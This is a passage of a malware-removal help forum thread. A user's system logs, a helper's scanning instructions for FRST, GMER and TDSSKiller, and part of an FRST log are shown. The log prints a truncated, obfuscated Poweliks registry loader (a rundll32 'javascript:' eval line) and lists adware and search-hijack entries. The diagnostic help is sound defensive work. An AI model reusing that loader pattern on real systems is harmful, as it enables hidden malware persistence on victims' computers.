CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CutePDF Writer 3.0
D3DX10
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition
Emsisoft Anti-Malware
File Association Helper
Five Nights at Freddy's
FormsWorkFlow 2007
GamingWonderland Internet Explorer Toolbar
HP Officejet 6600 Basic Device Software
HP Officejet 6600 Help
HP Support Solutions Framework
I.R.I.S. OCR
iTunes
Java 7 Update 67 (64-bit)
Junk Mail filter update
Microsoft Application Error Reporting
Microsoft Office
Microsoft Office 2010 Service Pack 1 (SP1)
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Home and Student 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Single Image 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Movie Maker
MSVCRT
MSVCRT_amd64
MSVCRT110
MSVCRT110_amd64
Nikon Message Center 2
Nikon Movie Editor
Origin
Pdf995
Photo Common
Photo Gallery
Plants vs. Zombies - Game of the Year
PlayReady PC Runtime amd64
Premium Sound HD
Realtek Ethernet Controller Driver
Realtek High Definition Audio Driver
Realtek USB 2.0 Card Reader
Realtek WLAN Driver
Security Update for Microsoft Excel 2010 (KB2597126) 32-Bit Edition
Security Update for Microsoft InfoPath 2010 (KB2687417) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553091)
Security Update for Microsoft Office 2010 (KB2553096)
Security Update for Microsoft Office 2010 (KB2553371) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553447) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2589320) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2597986) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2598243) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687501) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687510) 32-Bit Edition
Security Update for Microsoft PowerPoint 2010 (KB2553185) 32-Bit Edition
Security Update for Microsoft Visio Viewer 2010 (KB2598287) 32-Bit Edition
Security Update for Microsoft Word 2010 (KB2760410) 32-Bit Edition
SPORE™
Steam
Synaptics Pointing Device Driver
The Sims™ 3
The Sims™ 3 Generations
The Sims™ 3 Late Night
The Sims™ 3 Pets
The Sims™ 3 Supernatural
The Sims™ 4
Toshiba App Place
TOSHIBA Application Installer
TOSHIBA Desktop Assist
TOSHIBA eco Utility
TOSHIBA Function Key
Toshiba Password Utility
TOSHIBA PC Health Monitor
TOSHIBA Quality Application
TOSHIBA Recovery Media Creator
TOSHIBA Resolution+ Plug-in for Windows Media Player
TOSHIBA Service Station
TOSHIBA System Driver
TOSHIBA System Settings
TOSHIBA User's Guide
TOSHIBA VIDEO PLAYER
TOSHIBARegistration
Unity Web Player
Update for Microsoft Office 2010 (KB2553065)
Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition
Update for Microsoft Office 2010 (KB2566458)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2687277) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition
ViewNX 2
Visual Studio 2010 x64 Redistributables
Visual Studio 2012 x64 Redistributables
Visual Studio 2012 x86 Redistributables
WildTangent Games
Windows Live Communications Platform
Windows Live Essentials
Windows Live Installer
Windows Live Mail
Windows Live MIME IFilter
Windows Live Photo Common
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
WinRAR 5.01 (64-bit)
WinZip 17.5
Wizard101
.
==== Event Viewer Messages From Past Week ========
.
10/9/2014 5:39:34 PM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.
10/9/2014 5:39:34 PM, Error: Service Control Manager [7000]  - The Steam Client Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
10/9/2014 3:54:29 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {4D111E08-CBF7-4F12-A926-2C7920AF52FC}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC}
10/9/2014 3:51:41 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {E96767E0-7EAA-45E1-8E7D-64414AFF281A}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{E96767E0-7EAA-45E1-8E7D-64414AFF281A}
10/9/2014 3:46:20 PM, Error: Schannel [36888]  - A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 80. The Windows SChannel error state is 301.
10/9/2014 2:27:37 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {BB46F03E-7CD2-489F-8F95-BB950F395FDB}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{16D99191-6280-4B33-A2F5-04805A0FC582}
10/9/2014 10:05:02 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
10/9/2014 10:04:39 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {76D0CB12-7604-4048-B83C-1005C7DDC503}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
10/8/2014 3:09:21 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
10/13/2014 9:50:01 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {30D49246-D217-465F-B00B-AC9DDD652EB7}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{30D49246-D217-465F-B00B-AC9DDD652EB7}
10/13/2014 10:25:09 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {ECF5BF46-E3B6-449A-B56B-43F58F867814}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
10/13/2014 10:17:30 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16.4.4206.722_x64__8wekyb3d8bbwe\LiveComm.exe" -ServerName:Microsoft.WindowsLive.Platform.Server
10/12/2014 11:17:43 AM, Error: Microsoft-Windows-HttpEvent [15006]  - Owner of the log file or directory \SystemRoot\System32\LogFiles\HTTPERR\httperr1.log is invalid. This could be because another user has already created the log file or the directory.
10/11/2014 9:55:44 PM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the HP Support Solutions Framework Service service to connect.
10/11/2014 9:55:44 PM, Error: Service Control Manager [7000]  - The HP Support Solutions Framework Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
10/11/2014 10:33:46 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: {581333F6-28DB-41BE-BC7A-FF201F12F3F6} as NT Authority/LocalService. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{478B41E6-3257-4519-BDA8-E971F9843849}
10/11/2014 10:30:30 PM, Error: Service Control Manager [7034]  - The Diagnostic System Host service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:30:30 PM, Error: Service Control Manager [7034]  - The Device Association Service service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The WLAN AutoConfig service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Windows Audio Endpoint Builder service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Superfetch service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Program Compatibility Assistant Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Human Interface Device Access service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The HomeGroup Listener service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The File History Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:30:30 PM, Error: Service Control Manager [7031]  - The Distributed Link Tracking Client service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/11/2014 10:29:33 PM, Error: Service Control Manager [7031]  - The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
10/11/2014 10:27:24 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {3AD05575-8857-4850-9277-11B85BDB8E09}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
10/11/2014 10:18:20 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0xc000021a (0xfffff8a00f31aa90, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\windows\MEMORY.DMP. Report Id: 101114-49483-01.
10/11/2014 10:15:38 PM, Error: Service Control Manager [7034]  - The Plug and Play service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:15:38 PM, Error: Service Control Manager [7034]  - The Local Session Manager service terminated unexpectedly.  It has done this 1 time(s).
10/11/2014 10:15:38 PM, Error: Service Control Manager [7031]  - The Power service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Reboot the machine.
10/11/2014 10:15:38 PM, Error: Service Control Manager [7031]  - The DCOM Server Process Launcher service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Reboot the machine.
10/11/2014 10:15:38 PM, Error: Service Control Manager [7031]  - The Background Tasks Infrastructure Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Reboot the machine.
10/11/2014 10:11:31 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {1F2E5C40-9550-11CE-99D2-00AA006E086C}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{1F2E5C40-9550-11CE-99D2-00AA006E086C}
10/10/2014 9:02:41 AM, Error: volmgr [46]  - Crash dump initialization failed!
10/10/2014 7:39:15 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}
10/10/2014 12:20:48 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {06622D85-6856-4460-8DE1-A81921B41C4B}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
10/10/2014 12:16:56 PM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {E95186C7-7D80-4311-843D-0702CBC8B1E4}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{E95186C7-7D80-4311-843D-0702CBC8B1E4}
10/10/2014 12:13:50 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: {BA7C0D29-81CA-4901-B450-634E20BB8C34} as Unavailable/Unavailable. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{AA0B85DA-FDDF-4272-8D1D-FF9B966D75B0}
10/10/2014 11:34:21 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {3519154C-227E-47F3-9CC9-12C3F05817F1}. The error: "2" Happened while starting this command: C:\windows\SysWOW64\DllHost.exe /Processid:{AD3EDBCA-0901-415B-82E9-C16D3B65E38C}
10/10/2014 10:19:19 AM, Error: Microsoft-Windows-DistributedCOM [10000]  - Unable to start a DCOM Server: {0358B920-0AC7-461F-98F4-58E32CD89148}. The error: "2" Happened while starting this command: C:\windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
.
==== End Of File ===========================

 

 

I admit I turned off the DCOM server, but that was because I thought it was allowing the conhost file to run more than two instances (it would run 15 or so).

 

Also, this infected my Windows 7 computer; it seems to be missing the keyboard and mouse drivers, though the keyboard does work in DOS.  I haven't started on that one yet.

 

Thanks for any help you can give me.
 




#2 TB-Psychotic

TB-Psychotic

  • Malware Response Team
  • 6,349 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:47 AM

Posted 14 October 2014 - 04:55 AM

Hi there,
my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

  • First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while following my instructions, stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you cannot post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
  • My first language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

  • Important: To help me review your logs, please post them in code boxes. You can create them by clicking on the <>-symbol on top of the reply window.

 
 
 
 
HijackThis is not the preferred initial scanning tool in this forum. With today's malware, a more comprehensive set of logs is required to determine the presence of malware.
 
 
  
Scan with FRST in normal mode

Please download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)
 
  • Run FRST.
  • Don't change any of the checkboxes and hit Scan.
  • Logfiles are created on your desktop.
  • Post the FRST.txt and (after the first scan only!) the Addition.txt.

 
 
Scan with Gmer rootkit scanner

Please download Gmer from here by clicking on the "Download EXE" Button.
  • Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.
  • If it gives you a warning about rootkit activity and asks if you want to run scan...click on NO.
  • In the right panel, you will see several boxes that have been checked. Uncheck the following ...
    • Sections
    • IAT/EAT
    • Show All ( should be unchecked by default )
  • Leave everything else as it is.
  • Close all other running programs as well as your Browser.
  • Click the Scan button & wait for it to finish.
  • Once done click on the Save.. button, and in the File name area, type in "ark.txt" or it will save as a .log file which cannot be uploaded to your post.
  • Save it where you can easily find it, such as your desktop.
  • Please post the content of the ark.txt here.

**Caution**
Rootkit scans often produce false positives. Do NOT take any action on any "<--- ROOTKIT" entries

Scan with TDSS-Killer

Please read and follow these instructions carefully. We do not want it to fix anything yet (if found), we need to see a report first.

Download TDSSKiller.zip and extract to your desktop
  • Execute TDSSKiller.exe by double-clicking on it.
  • Press Start Scan
  • If Malicious objects are found, do NOT select Copy to quarantine. Change the action to Skip, and save the log.
  • Once complete, a log will be produced at the root drive, which is typically C:\, for example, C:\TDSSKiller.<version_date_time>log.txt


Please attach this file to your next reply.
 


Proud Member of UNITE & TB
 

#3 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 14 October 2014 - 05:41 PM

Hi, and thanks for responding.

 

I was running FRST and AVG wanted to "protect me".  Should I disable my antivirus before running FRST, or do I tell AVG that FRST is from a trusted source? 

 

Thanks

 

Jeremy



#4 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 14 October 2014 - 10:55 PM

Hi again.

 

Well, I decided to create an exception for FRST64 and ran the scan. The reports follow, in the code box.

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 14-10-2014
Ran by Jeremy and Heidi (administrator) on TOSHIBA_LAPTOP on 14-10-2014 19:30:42
Running from C:\Users\Jeremy and Heidi\Downloads
Loaded Profile: Jeremy and Heidi (Available profiles: Jeremy and Heidi)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\Common\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoService.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\TMachInfo.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Hotkey\TCrdMain_Win8.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoResident.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHWMsg.exe
(TOSHIBA Corporation) C:\Program Files (x86)\Toshiba\System Setting\TSleepSrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgui.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\ToshibaServiceStation.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12936848 2012-07-13] (Realtek Semiconductor)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170784 2012-07-27] (SRS Labs, Inc.)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2608040 2012-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [169896 2012-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [356776 2012-07-11] (TOSHIBA Corporation)
HKLM\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSleepSrv.exe [1548952 2012-08-04] (TOSHIBA Corporation)
HKLM\...\Run: [TODDMain] => C:\Program Files (x86)\TOSHIBA\System Setting\TODDMain.exe [213136 2012-08-04] ()
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [642216 2012-08-08] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2014\avgui.exe [5188112 2014-08-25] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-05-15] (Apple Inc.)
HKLM-x32\...\Run: [GamingWonderland EPM Support] => "C:\PROGRA~2\GAMING~2\bar\1.bin\gtmedint.exe" T8EPMSUP.DLL,S
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [570880 2013-12-27] (Nikon Corporation)
HKLM-x32\...\Run: [emsisoft anti-malware] => c:\program files (x86)\emsisoft anti-malware\a2guard.exe [4873248 2014-10-13] (Emsisoft GmbH)
HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll File Not Found
Startup: C:\Users\Jeremy and Heidi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://facebook.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
SearchScopes: HKLM - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM - {31090377-0740-419E-BEFC-A56E50500D5B} URL = http://speedial.com/results.php?f=4&q={searchTerms}&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
SearchScopes: HKLM - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM-x32 - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
